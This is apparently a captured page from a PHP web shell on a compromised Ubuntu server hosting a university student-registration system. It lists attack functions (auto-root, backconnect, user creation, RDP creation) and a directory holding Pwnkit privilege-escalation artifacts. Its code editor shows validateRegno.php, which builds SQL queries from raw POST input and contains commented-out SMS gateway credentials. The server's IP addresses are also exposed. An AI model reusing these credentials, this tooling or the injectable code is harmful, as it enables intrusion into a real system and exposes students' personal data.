Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.136.18.192
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
phdadm /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxrwxrwx
.pkexec
[ DIR ]
drwxr-xr-x
.vscode
[ DIR ]
drwxrwxrwx
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
PHPExcel
[ DIR ]
drwxrwxrwx
Paytm
[ DIR ]
drwxrwxrwx
acu
[ DIR ]
drwxrwxr-x
acu-admin
[ DIR ]
drwxrwxr-x
admin-src
[ DIR ]
drwxrwxrwx
bcu
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
docs
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
libs
[ DIR ]
drwxrwxrwx
pgadm
[ DIR ]
drwxrwxrwx
pget_photos
[ DIR ]
drwxrwxrwx
pgetadm
[ DIR ]
drwxrwxrwx
plugins
[ DIR ]
drwxrwxrwx
razorpay
[ DIR ]
drwxrwxrwx
src
[ DIR ]
drwxrwxrwx
tcpdf
[ DIR ]
drwxrwxrwx
uniclare
[ DIR ]
drwxrwxr-x
upload
[ DIR ]
drwxrwxrwx
uploads
[ DIR ]
drwxrwxrwx
vku-admin
[ DIR ]
drwxrwxrwx
vskub
[ DIR ]
drwxrwxrwx
.DS_Store
22
KB
-rwxrwxrwx
.gitignore
67
B
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
.phdadm.php
3.61
KB
-rw-r--r--
AVAIL_SEATS_16112021.pdf
353.8
KB
-rwxrwxrwx
app.php
498
B
-rwxrwxrwx
casteupload.php
1.19
KB
-rw-r--r--
cconfig.php
1.84
KB
-rwxrwxrwx
consts.php
212
B
-rwxrwxrwx
database.php
643
B
-rwxrwxrwx
degreedocupload.php
1.19
KB
-rw-r--r--
forgot-password.php
2.19
KB
-rwxrwxrwx
hkupload.php
1.18
KB
-rw-r--r--
instruction_regn.html
4.44
KB
-rwxrwxrwx
login.php
317
B
-rwxrwxrwx
logo.jpg
85.69
KB
-rwxr-xr-x
nocupload.php
1.18
KB
-rw-r--r--
otherdocupload.php
1.19
KB
-rw-r--r--
pgResponse.php
12.83
KB
-rwxrwxrwx
photoupload.php
1.26
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
resetpassword.php
697
B
-rwxrwxrwx
rzp.csv
67
B
-rwxrwxrwx
sendGridMail.php
1.28
KB
-rwxrwxrwx
sendMobEmailOTP.php
3.55
KB
-rwxrwxrwx
sendsmsapi.php
814
B
-rwxrwxrwx
signin.php
973
B
-rwxrwxrwx
signup.php
1.22
KB
-rwxrwxrwx
some_excel_file.xlsx
6.6
KB
-rwxrwxrwx
student.php
13.52
KB
-rwxrwxrwx
teachdocupload.php
1.19
KB
-rw-r--r--
test.php
16
B
-rwxrwxrwx
ugcdocupload.php
1.15
KB
-rw-r--r--
upload.php
415
B
-rwxrwxrwx
upload1.php
423
B
-rwxrwxrwx
upload_file.php
787
B
-rwxrwxrwx
upload_file_org.php
787
B
-rwxrwxrwx
upload_file_pg.php
740
B
-rwxrwxrwx
validateRegno.php
2.1
KB
-rwxrwxrwx
validateRegno_04092020.php
2.03
KB
-rwxrwxrwx
verify.php
12.85
KB
-rwxrwxrwx
vkurankupd.php
1.27
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : validateRegno.php
<?php include ("../database.php"); require_once('../../sms/sendsmsapiv1.php'); error_reporting(E_ALL); ini_set('display_errors', 'on'); $mobile = trim($_POST['mobile']); $femail = trim($_POST['email']); $query = "SELECT fname, ifnull(femail,'') as femail from collstud where fmobileno = '{$mobile}' and factive = 'T'"; $result = mysqli_query($conn,$query); $count = mysqli_num_rows($result); if($count == 0) { //date_default_timezone_set('Asia/Kolkata'); //$time = date("h:i A"); //$motpaswrd = rand(1000, 9000); //strtoupper(substr(sha1(rand()), 0, 4)); //$smsotp = "Dear Student, Your mobile OTP for Registration is {$motpaswrd} sent at {$time}"; $db = $_REQUEST['db']; $FFOLDER = ""; if($db == 'bcu') $FFOLDER = "BCU"; else if($db == 'vskub') $FFOLDER = "VSKUB"; else if($db == 'rcub') $FFOLDER = "RCUB"; else if($db == 'ru') $FFOLDER = "RUR"; else if($db == 'acu') $FFOLDER = "ACU"; date_default_timezone_set('Asia/Kolkata'); $time = date("h:i A"); $otp = rand(1000, 9000); $smsotp = "From $FFOLDER: Dear Student, OTP for Registration is $otp. sent at {$time} - Uniclare"; // $username = 'logisyhttp'; // $password = 'logisy@928'; // $from = 'UNISOL'; // $to = $mobile; // $text = $smsotp; // $category = ''; // $smsresp = sendsmaapi($username,$password,$from,$to,$text,$category); $sms = new SMS('026', 'OTP'); $sms->sendIndvidualSms($mobile, $smsotp, '900', 'PHD','',''); //var_dump($smsresp); $smsresp = 'Sent'; $row["sms"] = $smsresp; /*$query = "update collstud set fmobileotp = '{$motpaswrd}', fmobotptime = now(), fotpcounter = fotpcounter+1 where fmobileno = '{$mobile}'";*/ $query = "insert into collstud(fmobileno, fmobileotp, fmobotptime, fotpcounter, fcollcode, fdegree) values( '{$mobile}', '{$otp}', now(), 1, 'PHD', 'PHD') on duplicate key update fmobileotp = '{$otp}', fmobotptime = now(), fotpcounter = fotpcounter+1"; $result = mysqli_query($conn,$query); if($result) $row["status"] = 'success'; echo json_encode($row); } else { $row["status"] = 'invalid'; $row["msg"] = 'You have already registered, Please Login'; echo json_encode($row); } ?>
Close